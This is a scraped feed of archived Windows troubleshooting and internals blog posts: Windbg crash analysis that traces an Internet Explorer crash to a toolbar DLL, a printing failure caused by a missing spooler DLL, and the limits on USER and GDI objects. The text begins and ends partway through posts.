side. The goal is to find the thread that has functions with the words <EM> fault </EM> , <EM> exception </EM> , or <EM> unhandled </EM> in their names. You can quickly do this by selecting each thread in the Processes and Threads window, pressing Enter, and then scanning the stack that appears in the Call Stack window. After doing this for the first few threads, I came across the thread I was looking for, revealed by functions all over its stack containing the telltale strings: </P> <BR /> <P> <IMG alt="image" border="0" height="284" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2703.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121230i6B6E88E4D783BBB9" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> Unfortunately, I was at an apparent dead end as far as fingering an add-on: all the DLLs shown in the call stack were Microsoft’s. There was one indicator that there might be an add-on hidden from view though, and that was the text reporting that Windbg couldn’t find symbols for at least some of the stack’s frames, so was forced to make guesses about the stack’s layout and was showing an address that didn’t lie within any DLL: </P> <BR /> <P> <IMG alt="image" border="0" height="83" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2781.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121231iE1F26EE92EF2ADCA" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="454" /> </P> <BR /> <P> This happens when a DLL uses <EM> frame pointer omitted </EM> (FPO) calling conventions, which in the absence of symbolic information for the DLL prevents the debugger from finding stack frames just by following the frame-pointer chain. The return addresses for the functions the thread invoked must be on the stack (unless they were overwritten by the bug that caused the crash), but Windbg’s heuristics couldn’t locate them. </P> <BR /> <P> There’s a Windbg command that you can use in these cases to hunt for the missing frame function addresses, the Display Words and Symbols command. If you’re debugging a 32-bit process, use the <EM> dds </EM> version of the command and if it’s a 64-bit process use <EM> dqs </EM> . You can also use <EM> dps </EM> (Display Pointer Symbols), which will interpret the function addresses as the appropriate size for a 32-bit or 64-bit process. The address to give to the command as the starting point should be the address of the stack frame immediately above the one where Windbg got lost. To see the address, click on the Addrs button in&nbsp;the call stack dialog: </P> <BR /> <P> <IMG alt="image" border="0" height="105" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3683.image_5F00_thumb_5F00_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121232iA8F47F5180064C0C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="304" /> </P> <BR /> <P> The address on the frame in question was 2cbc5c8: </P> <BR /> <P> <IMG alt="image" border="0" height="64" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4341.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121233i447DB7A4DC10F9F7" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <BR /> <P> I passed it to dds as the argument and pressed enter: </P> <BR /> <P> <IMG alt="image" border="0" height="104" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2781.image_5F00_thumb_5F00_17.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121234i478BE0A52991AE84" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <BR /> <P> The first page of results didn’t list any functions besides the expected one, KiUserException. I hit the enter key again without typing another command, because for address-based commands like dds, that tells Windbg to repeat the last the last command at the address where it left off. The second page of results yielded something more interesting, the name of a DLL I wasn’t familiar with: </P> <BR /> <P> <IMG alt="image" border="0" height="134" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0068.image_5F00_thumb_5F00_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121235iED0B40E1C56C107D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <BR /> <P> An easy way to see version information for a module without leaving Windbg is to use the <EM> lm </EM> (List Modules) command. The output of that command told me that Yt.dll (the name of the DLL is the text to the left of the “!”) was part of the Yahoo Toolbar: </P> <BR /> <P> <IMG alt="image" border="0" height="266" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6013.image_5F00_thumb_5F00_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121236i7E71EE6811BCFC07" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <BR /> <P> This came as a surprise because the system on which the crash occurred was my home gaming system, a computer that I’d only had for a few weeks. The only software I generally install on my gaming systems are Microsoft Office and games. I don’t use browser toolbars and if I did, would obviously use the one from Bing, not Yahoo’s. Further, the date on the DLL showed that it was almost two years old. I’m pretty diligent about looking for opt-out checkboxes on software installers, so the likely explanation was that the toolbar had come onto my system piggybacking on the installation of one of the several video-card stress testing and temperature profiling tools I used while overclocking the system. I find the practice of forcing users to opt-out annoying and not giving them a choice even more so, so was pretty annoyed at this point. A quick trip to the Control Panel and a few minutes later and my system was free from the undesired and out-of-date toolbar. </P> <BR /> <P> Using a couple of handy troubleshooting techniques, within less than five minutes I had identified the probable cause of the crash I experienced, made my system more reliable, and probably even improved its performance. Case closed. </P> </BODY></HTML> Thu, 27 Jun 2019 07:04:25 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-random-ie-crash/ba-p/723924 MarkRussinovich 2019-06-27T07:04:25Z The Case of the Printing Failure https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-printing-failure/ba-p/723911 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 12, 2010 </STRONG> <BR /> <P> The most interesting cases I receive are those that demonstrate a unique troubleshooting technique or uncover an interesting root cause. I received this one recently that has both characteristics. The case opened when a systems administrator got a report from a user that they were unable to print from their computer. There was no visible reaction to clicking on a print dialog or menu item, where normally they saw a dialog stating that the document had been sent to the printer and a tray icon appear representing the active print queue. </P> <P> The first thing the administrator did was to scan the event logs of the user’s machine, looking for any printing-related events. He quickly came upon two that correlated with the user’s most recent printing attempt: </P> <TABLE border="0" cellpadding="2" cellspacing="0" width="550"> <TBODY> <TR> <TD valign="top" width="275"> <IMG alt="image" border="0" height="168" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_C074/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121219i57C214EB4F9294E9" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="278" /> </TD> <TD valign="top" width="275"> <IMG alt="image" border="0" height="192" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_C074/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121220iEDEC724A86192CF8" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="278" /> </TD> </TR> </TBODY> </TABLE> <P> </P> <P> </P> <P> </P> <P> It appeared that the Spooler Service started when the user tried to print, but terminated, apparently with an exception (unexpectedly), about a minute later. The question was why? </P> <P> The administrator turned to <A href="#" target="_blank"> Sysinternals Procdump </A> . Procdump is a utility that generates crash dump files of a process when triggers you specify occur. Implemented triggers include CPU usage, virtual memory usage, unhandled exceptions, and process termination. You can use the CPU usage trigger, for example, to capture the state of a process when it hits a short-lived CPU burst, allowing you to look into the process to see the reason for the spike. The administrator guessed that the stack trace of the terminating thread might provide a clue. </P> <P> He knew that he had some time to get Procdump running after the Spooler Service started, so he launched Notepad, tried to print, and then executed Procdump with the –e option and the name of the Spooler Service process (Spoolsv) to have Procdump wait until the service exited before writing the dump file. A few seconds later Procdump reported that it had completed the job and saved a dump file: </P> <P> <IMG alt="image" border="0" height="294" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_A91F/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121221i7FF0F03FBA6A2F0E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="454" /> </P> <P> </P> <P> </P> <P> He opened the dump in Windbg and executed the ‘k’ command, which has Windbg dump the stack of the thread that caused the crash. The stack trace, which essentially lists a record of the function calls executed before the crash, showed that the process died in a sequence of calls that included several Ldr functions, including LdrpLoadDll: </P> <P> <IMG alt="image" border="0" height="252" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_A91F/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121222i65A7C48BF66F6153" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> A web search revealed that <A href="#" target="_blank"> LdrpLoadDll </A> is a function related to the system’s DLL loader. Suspecting that the process was dying either because it couldn’t find a DLL it was looking for or was loading an incorrect DLL, he turned to <A href="#" target="_blank"> Process Monitor </A> , which would enable him to see the process’s DLL-related file system activity. He started Process Monitor, attempted to print again, and then stopped the capture. Working his way from the end of the trace back to the beginning, he scanned for hints of the root cause. Shortly before Spoolsvc exited, he saw it searching unsuccessfully for Localspl.dll in various directories on the system: </P> <P> <IMG alt="image" border="0" height="208" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_A91F/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121223i3356127E5DDFD908" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> He assumed that the DLL was supposed to be there. When he looked at an another identically configured Windows XP system on his network, he found Localspl.dll in the \Windows\System32 directory, but not on the system experiencing the problem: </P> <P> <IMG alt="image" border="0" height="160" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_C074/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121224i070B86BEAEF8B46E" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="311" /> </P> <P> The file’s description reported it to be the Local Spooler DLL, which explained the Spooler’s inability to support printing operations. After he copied the file from the working system, he was able to print successfully. </P> <P> As far as the user was concerned, the case was closed and he was able to get back to work, but the administrator was left with the question of what had happened to the original DLL. Another web search turned up forum posts from others that had experienced the same problem. <A href="#" target="_blank"> One post in particular </A> described the exact symptoms he’d seen, including the event log entries, suggested the same fix of copying Localspl.dll from another system, and blamed uninstallers of third-party print and fax software for incorrectly deleting Localspl.dll: </P> <P> <IMG alt="image" border="0" height="302" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_A91F/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121225iB3450BAE0053D6E8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="454" /> </P> <P> He couldn’t say for certain that was the case for this particular system because the end user didn’t remember uninstalling printing or fax software, but the post had at least given him a plausible theory to replace the unease he would have been left with that files were mysteriously being deleted from his systems. He could now close the case thanks to Procdump and Process Monitor. </P> <P> If you solve an interesting case with Sysinternals tools, please send me screenshots (.PNG preferred) and log files so that I can share them with others in this blog and my presentations. </P> </BODY></HTML> Thu, 27 Jun 2019 07:03:05 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-printing-failure/ba-p/723911 MarkRussinovich 2019-06-27T07:03:05Z Pushing the Limits of Windows: USER and GDI Objects – Part 2 https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-user-and-gdi-objects-8211-part-2/ba-p/723897 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 31, 2010 </STRONG> <BR /> <P> <A href="#" target="_blank"> Last time </A> , I covered the limits and how to measure usage of one of the two key window manager resources, USER objects. This time, I’m going to cover the other key resource, GDI objects. As always, I recommend you read the previous posts before this one, because some of the limits related to USER and GDI resources are based on limits I’ve covered. Here’s a full index of my other Pushing the Limits of Windows posts: </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> </BLOCKQUOTE> <H5> GDI Objects </H5> <P> <A href="#" target="_blank"> GDI objects </A> represent graphical device interface resources like fonts, bitmaps, brushes, pens, and device contexts (drawing surfaces). As it does for USER objects, the window manager limits processes to at most 10,000 GDI objects, which you can verify with Testlimit using the –g switch: </P> <P> <IMG alt="image" border="0" height="115" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_20.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121205iF8F6F0E8C3EEAF91" title="image" width="454" /> </P> <P> You can look at an individual process’s GDI object usage on the Performance page of its Process Explorer process properties dialog and add the GDI Objects column to Process Explorer to watch GDI object usage across processes: </P> <P> <IMG alt="image" border="0" height="225" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_47.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121206i74FD225EF92D779A" title="image" width="264" /> </P> <P> Also like USER objects, 16-bit interoperability means that USER objects have 16-bit identifiers, limiting them to 65,535 per session. Here’s the desktop as it appeared when Testlimit hit that limit on a Windows Vista 64-bit system: </P> <P> <IMG alt="image" border="0" height="439" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_23.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121207iD54F282D157E504B" title="image" width="554" /> </P> <P> Note the Start button on the bottom left where it belongs, but the rest of the task bar at the top of the screen. The desktop has turned black and the sidebar has lost most of its color. Your mileage may vary, but you can see that bizarre things start to happen, potentially making it impossible to interact with the desktop in a reliable way. Here’s what the display switched to when I pressed the Start button: </P> <P> <IMG alt="image" border="0" height="439" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_24.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121208i7C4F8C4C2ACA535F" title="image" width="554" /> </P> <P> Unlike USER objects, GDI objects aren’t allocated from desktop heaps; instead, on Windows XP and Windows Server 2003 systems that don’t have Terminal Services installed, they allocate from general paged pool; on all other systems they allocate from per-session session pool. </P> <P> The kernel debugger’s “!vm 4” command dumps general virtual memory information, including session information at the end of the output. On a Windows XP system it shows that session paged pool is unused: </P> <P> <IMG alt="image" border="0" height="207" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_29.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121209i91697D31F950177F" title="image" width="432" /> </P> <P> On a Windows Server 2003 system without Terminal Services, the output is similar: </P> <P> <IMG alt="image" border="0" height="143" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_31.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121210i0BC05ABD443C4024" title="image" width="410" /> </P> <P> The GDI object memory limit on these systems is therefore the paged pool limit, as described in my previous post, <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> . However, when Terminal Services are installed on the same Windows Server 2003 system, you can see from the non-zero session pool usage that GDI objects come from session pool: </P> <P> <IMG alt="image" border="0" height="231" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_32.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121211i3E6B3EF0C3C19089" title="image" width="397" /> </P> <P> The !vm 4 command in the above output also shows the session paged pool maximum and session pool sizes, but the session paged pool maximum and session space sizes don’t display on Windows Vista and higher because they are variable. Session paged pool usage on those systems is capped by either the amount of address space it can grow to or the System Commit Limit, whichever is smaller. Here’s the output of the command on a Windows 7 system showing the current session paged pool usage by session: </P> <P> <IMG alt="image" border="0" height="289" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_33.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121212i61ED3348529865A4" title="image" width="376" /> </P> <P> As you’d expect, the main interactive session, Session 1, is consuming the most session paged pool. </P> <P> You can use the Testlimit tool with the “–g 0” switch to see what happens when the storage used for GDI objects is exhausted. The number you specify after the –g is the size of the GDI bitmap objects Testlimit allocates, but a size of 0 has Testlimit simply try and allocate the largest objects possible. Here’s the result on a 32-bit Windows XP system: </P> <P> <IMG alt="image" border="0" height="113" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_38.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121213i20A46A1955D2DA71" title="image" width="477" /> </P> <P> On a Windows XP or Windows Server 2003 that doesn’t have Terminal Services installed you can use the Poolmon utility from Windows Driver Kit (WDK) to see the GDI object allocations by their pool tag. The output of Poolmon the while Testlimit was exhausting paged pool on the WIndows XP system looks like this when sorted by bytes allocated (type ‘b’ in the Poolmon display to sort by bytes allocated), by inference indicating that Gh05 is the tag for bitmap objects on Windows Server 2003: </P> <P> <IMG alt="image" border="0" height="158" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_37.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121214i3AF87E97D538B57B" title="image" width="554" /> </P> <P> On a Windows Server 2003 system with Terminal Services installed, and on Windows Vista and higher, you have to use Poolmon with the /s switch to specify which session you want to view. Here’s Testlimit executed on a Windows Server 2003 system that has Terminal Services installed: </P> <P> <IMG alt="image" border="0" height="125" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_35.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121215i2F7380C950EEA265" title="image" width="472" /> </P> <P> The command “poolmon /s1” shows the tags with the largest allocation contributing for Session 1. You can see the Gh15 tag at the top, showing that a different pool tag is being used for bitmap allocations: </P> <P> <IMG alt="image" border="0" height="148" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_44.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121216iB3FB6E7D8E887742" title="image" width="554" /> </P> <P> Note how Testlimit was able to allocate around 58 MB of bitmap data (that number doesn’t account for GDI’s internal overhead for a bitmap object) on the Windows XP system, but only 10MB on the Windows Server 2003 system. The smaller number comes from the fact that session pool on the Windows Server 2003 Terminal Server system is only 32 MB, which is about the amount of memory Poolmon shows attributed to the Gh15 tag. The output of “!vm 4” confirms that session pool for Session1 is been consumed and that subsequent attempts to allocate GDI objects from session pool have failed: </P> <P> <IMG alt="image" border="0" height="251" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_40.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121217i58EE730C741FE15D" title="image" width="421" /> </P> <P> You can also use the !poolused kernel debugger command to look at session pool usage. First, switch to the correct session by using the .process command with the /p switch and the address of a process object that’s connected to the session. To see what processes are running in a particular session, use the !sprocess command. Here’s the output of !poolmon on the same Windows Server 2003 system, where the “c” option to !poolused has it sort the output by allocated bytes: </P> <P> <IMG alt="image" border="0" height="430" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_45.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121218iA6BBDCEC0311243A" title="image" width="554" /> </P> <P> Unfortunately, there’s no public mapping between the window manager’s heap tags and the objects they represent, but the kernel debugger’s !poolused command uses the triage.ini file from the debugger’s installation directory to print more descriptive information about a tag. The command reports that Gh15 is GDITAG_HMGR_SPRITE_TYPE, which is only slightly more helpful, but others are more clear. </P> <P> Fortunately, most GDI and USER object issues are limited to a particular process hitting the per-process 10,000 object limit and so more advanced investigation to figure out what process is responsible for exhausting session pool or allocating GDI objects to exhaust paged pool is unnecessary. </P> <P> Next time I’ll take a look at System Page Table Entries (System PTEs), another key system resource that can has limits that can be hit, especially on Remote Desktop sessions on Windows Server 2003 systems. </P> </BODY></HTML> Thu, 27 Jun 2019 07:02:14 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-user-and-gdi-objects-8211-part-2/ba-p/723897 MarkRussinovich 2019-06-27T07:02:14Z Pushing the Limits of Windows: USER and GDI Objects – Part 1 https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-user-and-gdi-objects-8211-part-1/ba-p/723881 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Feb 24, 2010 </STRONG> <BR /> <P> So far in the Pushing the Limits of Windows series, I’ve focused on resources managed by the Windows operating system kernel, including physical and virtual memory, paged and nonpaged pool, processes, threads and handles. In this and the next post, however, I will explore two resources managed by the Windows window manager, USER and GDI objects, that represent window elements (like windows and menus) and graphics constructs (like pens, brushes and drawing surfaces). Just like for the other resources I’ve discussed in previous posts, exhausting the various USER and GDI resource limits can lead to unpredictable behavior, including application failures and an unusable system. </P> <P> As always, I recommend you read the previous posts before this one, because some of the limits related to USER and GDI resources are based on limits I’ve covered. Here’s a full index of my other Pushing the Limits of Windows posts: </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> </BLOCKQUOTE> <H5> Sessions, Window Stations and Desktops </H5> <P> There are a few concepts that make the relationship between USER objects, GDI objects, and the system more clear. The first is the session. A session represents an interactive user logon that has its own keyboard, mouse and display and represents both a security and resource boundary. </P> <P> The session concept was first introduced with Terminal Services (now called Remote Desktop Services) in Windows NT 4 Terminal Server Edition, where the physical display, keyboard and mouse concepts were virtualized for each user interactively logging on to a system remotely, and core Terminal Services functionality was built into Windows 2000 Server. In Windows XP, sessions were leveraged to create the Fast User Switching (FUS) feature that allows you to switch between multiple interactive logins on the same physical display, keyboard and mouse. </P> <P> Thus, a session can be connected with the physical display and input devices attached to the system, connected with a logical display and input devices like ones presented by a Remote Desktop client application, or be in a disconnected state like exists when you switch away from a session with Fast User Switching or terminate a Remote Desktop Client connection without logging off the session. </P> <P> Every process is uniquely associated with a specific session, which you can see when you add the Session column to Sysinternals <A href="#" target="_blank"> Process Explorer </A> . This screenshot, in which I’ve collapsed the process tree to show only processes that have no parent, is from a Remote Desktop Services (RDS – formerly Terminal Server Services) system that has four active sessions: session 0 is the dedicated session in which system processes execute on Windows Vista and higher; session 1 is the session in which I’m writing this post; Session 2 is the session of another user account that I’m concurrently logged into from another system; and finally, session 3 is one that Remote Desktop Services proactively created to be ready for the next interactive logon: </P> <P> <IMG alt="image" border="0" height="212" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121192i27C89125AE1069F8" title="image" width="355" /> </P> <P> Since every process is associated with a specific session and the operating system usually only needs access to the session-specific data of the current process’s session, Windows defines a view into a process’s session data in the process’s virtual address space. Thus, when the system switches between threads of different processes, it also switches address spaces, switching the current session view. When the Csrss.exe process of Session 0 is the current process, for example, the address space mappings include the system address space (which is included in every process’s address space), Csrss’s address space, and the Session 0 address space. The region of memory mapping a session’s data is known as Session View Space or Session Space. When the system switches to a thread from Session 1’s Explorer process, the mappings change accordingly, and when it switches to a thread from Notepad, the Session 1 Session Space remains mapped: </P> <P> <IMG alt="image" border="0" height="297" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_50.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121193i09F6E463B6BFD7A9" title="image" width="260" /> </P> <P> Note that the figure isn’t exactly correct for 32-bit Windows Vista and higher, since <A href="#" target="_blank"> dynamic system address space </A> means that the Session Space isn’t necessarily contiguous and can grow and shrink as required on those systems. </P> <P> The next concept is the <A href="#" target="_blank"> desktop </A> , an object defined by the window manager to represent a virtual display that includes the windows associated with the desktop (note that this is different than Explorer’s definition of a desktop, which is the user’s directory with shortcuts and other objects the user places there). The default desktop is named “Default”, but applications can create additional desktops and switch the connection to the logical display, something the <A href="#" target="_blank"> Sysinternals Desktops </A> utility uses to create up to four virtual desktops a user can switch between. </P> <P> Finally, to support multiple virtual displays that are associated with the same window manager instance, the window manager defines the <A href="#" target="_blank"> window station </A> object. A window station is associated with a particular session and a session can have multiple window stations, but each session has only one interactive window station, called <EM> Winsta0 </EM> , that can connect with a physical or logical display, keyboard and mouse; the other window stations are essentially “headless” and support for them exists solely to isolate processes that expect window manager services, but that shouldn’t. For example, the system creates non-interactive window stations for each service account with which it associates processes running in the account, since Windows services should not display user-interfaces. </P> <P> You can see the window stations associated with Session 0 by looking in the Object Manager namespace under the \Windows directory using the <A href="#" target="_blank"> Sysinternals Winobj </A> tool (viewing the directory requires running elevated with administrative privileges). Here you can see that a window station the Microsoft Windows Search Service creates to run search filters in, window stations for each of the three built-in service accounts (System, Network Service and Local Service), and Session 0’s interactive window station: </P> <P> <IMG alt="image" border="0" height="198" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121194iCA3661F5BBD54D92" title="image" width="304" /> </P> <P> You can see the window stations associated with other sessions in the Sessions directory in the Object Manager namespace. Here’s the only window station, the interactive WinSta0 window station, associated with my logon session: </P> <P> <IMG alt="image" border="0" height="238" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121195iC2B1E137459CD556" title="image" width="304" /> </P> <P> This diagram shows the relationship between sessions, window stations, and desktops for a system that has one user logged into Session1 on the physical console and another logged on to Session 2 via a remote desktop connection where the user has run a virtual desktops utility and switched the display to Desktop1. </P> <P> <IMG alt="image" border="0" height="433" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121196i5820D58F40F16A60" title="image" width="450" /> </P> <P> Besides having an association with a particular session, processes are associated with a specific window station and desktop, though processes can switch between both and threads can switch between desktops. Thus, every process’s association can be represented with a hierarchical path like this: “Session 1\WinSta0\Default”. You can in most cases indirectly determine what window station and desktop a process is connected to by looking at its handle table in Process Explorer’s handle view to see the names of the objects it has open. This screen shots of the handle table of an Explorer process show that it is connected to the Default desktop on WinSta0 of Session 1: </P> <P> <IMG alt="image" border="0" height="317" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121197i1505E2A859AEC435" title="image" width="344" /> </P> <H3> User Objects </H3> <P> With the fundamental concepts in hand, let’s turn our attention first to USER objects. <A href="#" target="_blank"> USER objects </A> get their name from the fact that they represent user interface elements like desktops, windows, menus, cursors, icons, and accelerator tables (menu keyboard shortcuts). Despite the fact that USER objects are associated with a specific desktop, they must be accessible from all the desktops of a session, for example to allow a process on one desktop to register for a hotkey that can be entered on any of them. For that reason, the window manager assigns USER object identifiers that are scoped to a window station. </P> <P> A basic limitation imposed by the window manager is that no process can create more than 10,000 USER objects. That limitation attempts to prevent a single process from exhausting the resources associated with USER objects, either because it’s programmed with algorithms that can create excessive number of objects or because it 